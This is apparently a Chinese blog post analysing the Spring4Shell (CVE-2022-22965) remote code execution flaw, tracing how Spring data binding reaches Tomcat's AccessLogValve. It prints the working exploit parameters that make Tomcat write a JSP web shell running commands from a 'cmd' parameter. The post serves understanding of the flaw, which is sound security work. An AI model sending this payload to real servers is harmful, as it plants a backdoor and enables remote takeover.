Spring4Shell的漏洞原理分析

最新推荐文章于 2024-05-08 09:46:31 发布
最新推荐文章于 2024-05-08 09:46:31 发布
阅读量1.3k 收藏 5
点赞数 2
文章标签: java spring 反射 tomcat 接口
原文链接:https://mp.weixin.qq.com/s?__biz=MzAwNTMxMzg1MA==&mid=2654089170&idx=7&sn=87f0a59a710a0ae82fb014420b9c672a&chksm=80d80b87b7af8291a2d836cfb94dc3184a79df6d447a0a2c40a67a6e6febbd336b8bf5023a8b&scene=126&&sessionid=0
版权

Spring框架最新的PoC

这两天出来的一个RCE漏洞,但是有以下的条件限制才行:

  • 必须是jdk9及以上

  • 必须是部署在tomcat的应用

  • 是springmvc的或者webflux的应用

具体的可以查看spring官方:

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement

我看到这个漏洞的时候,就去查了以下怎么利用的,github一搜很多py脚本。

但是我没找到漏洞利用的原理,所以我就自己做了个demo,然后debugger了一下,原来是这样~

漏洞利用的原理

我们都知道,我们在springmvc的时候经常会这么写代码来接收前端传来的参数

@RequestMapping(value = "/register", method = RequestMethod.GET)
public String register(@RequestParam Map<String, String> requestparams, Model model) throws Exception {
    String email = requestparams.get("email");
    String username = requestparams.get("username");
    model.addAttribute("data", "email:" + email + " username:" + username);
    return "index";
}

如果我们这么访问:

http://localhost:8080/vulnerable_war/register?email=11&username=b

那么返回的结果就是这样:

0689bb967efee9785441379e450470f5.png
image

那么如果我们把接收的类型从Map转成一个POJO的话,就像这样:

@RequestMapping(value = "/register2", method = RequestMethod.GET)
public String register2(HelloWorld obj, Model model) throws Exception {
    model.addAttribute("data", obj.toString());
    return "index";
}

访问一下:

ce6cab41ba47785cc3e9f8da2cd12ee3.png
image

这说明了,springmvc框架帮我们做了一个很重要的事情:

通过我们请求的数据,转成了POJO对象。

恰巧就是这个非常好用的封装导致了这个POC

解析POC第一步:到底构造了一个什么数据会引发呢?

跑的环境是:

  • jdk11

  • tomcat8.5.58

  • spring-webmvc5.3.15

class.module.classLoader.resources.context.parent.pipeline.first.pattern=
%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

将上面的数据用下面post的方式调用下面的接口

1bc92570842d91f0e2c7fd74bd314335.png
image 
@RequestMapping(value = "/rapid7")
public void vulnerable(HelloWorld model) {

}

注意header里面的值是需要的,目的是为了迎合tomcat日志的pattern(下面会讲到)

  • %i 这个语法是从请求的header里面拿xxx

就会在tomcat的Root目录下生成一个jsp文件

2f3ef309d0b1cdf66708070e0e824cca.png
image

内容如下:

b61f9abe7aa0d3a160db62e827d1d815.png
image
计息POC第二步:jsp文件是怎么生成的?

方法接收的class:HelloWorld,我这么传,spring框架是怎么来处理的呢?

c6e24ca27ba2dba0430304706999ebb6.png
image

根据HelloWorld的实例

结合传过来属性路径:class.module.classLoader.resources.context.parent.pipeline.first.pattern

然后一步步的运用反射来去拿属性对应的值,这个例子的话就是

  • 调用HelloWorld的getClass() 拿到Class对象

  • 通过class对象调用getModule()

  • 通过Module调用getClassLoader()

  • 通过ClassLoader拿resources

  • context是Tomcat的StandardContext

  • parent拿到的是StandardEngine

  • pipeline拿到的是StandardPipeline

  • first拿到的是AccessLogValve

可以在下图所示设置断点:就可以看到上面说的每一步了8f13283d2e5a0e0554c8cc59145ef140.png

主角上场:bc8dab254c0747a8f4288260d20cce72.png

AccessLogValve是tomcat记录日志的,

  • pattern是日志格式

  • suffix是日志文件的后缀

  • prefix是日志文件的前缀

  • fileDateFormat是日期文件的时间格式

谜底揭晓

根据以上分析,我们知道,传过去的data由对象的class作为引子,然后springmvc会一步步反射拿属性的方式最终是给AccessLogValve对象的几个属性的赋值操作

经过对tomcat的处理请求的日志管道(AccessLogValve)的改写,导致当前请求会被触发记录日志,日志会按照我们想要的方式生成了一个jsp文件。

6ceac7c4a9ed811025ed1b0ed1e1d117.png
image

为啥是jdk9及以上版本呢,因为module的概念是从jdk9开始的~

为啥是得部署到tomcat里的应用呢,因为只有这样才会利用它的日志功能~

spring是咋修复的
d41f73b2ce9f1904c0da3e4574c35875.png
image

我是正东,学的越多不知道也越多。一个漏洞引发的思考~收获挺大!

dotNET跨平台
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1404
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
漏洞分析】 CVE-2022-22965-Spring漏洞Spring4Shell)环境搭建及漏洞分析
Zt_Zk的博客
08-25 1187
漏洞分析】 CVE-2022-22965-Spring漏洞Spring4Shell分析及修复方法
Spring4Shell Spring CVE-2022-22965漏洞調査
tomy的博客
04-01 4361
Spring4Shell Spring漏洞調査
探索Spring4Shell漏洞:一个安全研究者的必备工具
最新发布
gitblog_00066的博客
05-08 340
探索Spring4Shell漏洞:一个安全研究者的必备工具 项目地址:https://gitcode.com/BobTheShoplifter/Spring4Shell-PoC 在信息安全领域,对新出现的漏洞进行快速响应和理解至关重要。最近,Spring4Shell(CVE-2022-22965)引起了全球关注,这是一个影响广泛使用的Java框架Spring的重大远程代码执行(RCE)漏洞。为了帮...
记一次Spring4shell漏洞分析
向阳-Y.的博客
12-19 856
Spring4shell漏洞分析
Spring4Shell 漏洞已遭Mirai 僵尸网络利用
smellycat000的专栏
04-11 308
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Mirai 恶意软件正在利用 Spring4Shell exploit 感染易受攻击的 web 服务器并将其纳入DDoS(分布式拒绝服务)攻击Spring4Shell 是一个严重的远程代码执行 (RCE) 漏洞 (CVE-2022-22965),影响广泛使用的企业级 Java app 开发平台 Spring Frame...
Spring4Shell漏洞原理分析.doc
07-13
Spring4Shell 漏洞原理分析 Spring4Shell 是一个最近曝出的 RCE 漏洞,影响范围包括 JDK 9 及以上、Tomcat 部署的应用、Spring MVC 或 WebFlux 应用。该漏洞的出现引起了广泛关注,本文将深入分析漏洞原理。 ...
漏洞分析1
08-03
在本文中,我们将深入探讨一个名为"Spring-beans RCE漏洞分析1"的安全问题,它涉及到Spring框架中的远程代码执行(RCE)风险。这个漏洞主要出现在JDK 9及以上版本,并且与Spring-beans包以及Spring参数绑定机制有关...
CVE-2017-4971分析1
08-03
**漏洞原理** 漏洞的根本原因在于Spring Webflow处理视图状态中的空值映射(empty value mappings)的方式。在`AbstractMvcView`类的`addEmptyValueMapping`方法中,一个未验证的SpEL表达式被解析并执行。这个...
log4j 帮助文档
04-02
- Log4j的安全性问题不容忽视,特别是最近的Log4Shell漏洞(CVE-2021-44228),提醒我们定期更新和检查Log4j版本,确保系统的安全。 通过学习这个全面的Log4j帮助文档,开发者可以更好地利用日志进行问题定位、...
log4j-1.2.8.jar
03-01
例如,2021年爆发的Log4Shell漏洞就影响了许多使用旧版log4j的系统。因此,即使在维护旧系统时,也应关注安全更新,确保系统的安全性。 总结,log4j-1.2.8.jar作为一款经典的日志工具,其源码和实践应用对于我们...
Mirai僵尸网络利用Spring4Shell漏洞
Trouvailless的博客
04-22 1205
Mirai僵尸网络变种已经开始利用Spring4Shell漏洞。 3月底,研究人员发现了Spring4Shell 0day 漏洞,随后补丁发布。4月初,Trend Micro安全研究人员发现有攻击者利用Spring4Shell漏洞武器化Mirai 僵尸网络。 Spring4Shell漏洞概述 Spring框架是一个开源的J2EE应用程序框架,可以帮助软件开发人员快速开发具备企业级特征的Java 应用。近日,安全研究人员在Spring Java框架中发现了2个可以实现远程代码执行的安全漏洞,CVE编号分
Java用户注意|赛宁靶场刚还原了Spring4Shell漏洞
Cyberpeace的博客
04-02 3291
漏洞描述 作为目前全球最受欢迎的Java轻量级J2EE应用程序开源框架,Spring允许开发人员专注于业务逻辑,简化Java企业级应用的开发周期。 Spring Framework存在远程代码执行漏洞(CVE-2022-22965、CNVD-2022-23942),由于Spring框架存在处理流程缺陷,攻击者可在远程条件下,实现对目标主机的后门文件写入和配置修改,继而通过后门文件访问获得目标主机权限。使用Spring框架或衍生框架构建网站等应用,且同时使用JDK版本在9及以上版本的,易受此漏洞攻击影响。
命令执行漏洞漏洞原理
Lyh0558的博客
04-13 1999
命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 command1&command2 两个命令同时执行 command1&&command2 只有前面命令执行成功,后面命令才继续执行 command1;command2 不管前面命令执行成功没有,后面的命...
Spring Shell
weixin_34210740的博客
11-05 214
为什么80%的码农都做不了架构师?>>> ...
vulhub中Spring之CVE-2017-8046漏洞复现
weixin_41438728的博客
12-01 954
vulhub中Spring之CVE-2017-8046漏洞复现Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 Spring Data Rest 远程命令执行漏洞(CVE-2017-8046) 漏洞复现 漏洞说明 Spring Data REST是一个构建在Spring Data之上,为了帮助开发者更加容易地开发REST风格的Web服务。在REST API的Patch方法中(实现RFC6902),p
Spring4shell远程命令执行(CVE-2022-22965)
m0_58596609的博客
10-09 2114
Spring4shell远程命令执行(CVE-2022-22965
Spring Shell 源码分析
汪小哥
12-01 981
参考实例 Java程序员的命令行工具 spring-shell-源码解析-video 一、起源 1.1 原由 为什么要使用spring shell,在公司中,发现同事使用scala 写了一个交互的命令行程序,其实就是scala自带的信,注册了函数,感觉使用起来挺方便的,为啥Java里面没有这样的使用东西!挺好奇的,我想使用一个接入简单方便,不要花费太多的时间,且我们要熟悉!最后发现spring...
spring4shell
03-16
Spring4Shell是一个基于Spring框架的命令行工具,它可以帮助开发者快速构建命令行应用程序。它提供了一些常用的命令行操作,例如文件操作、网络操作、系统操作等。同时,它也支持自定义命令和参数,可以根据具体需求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值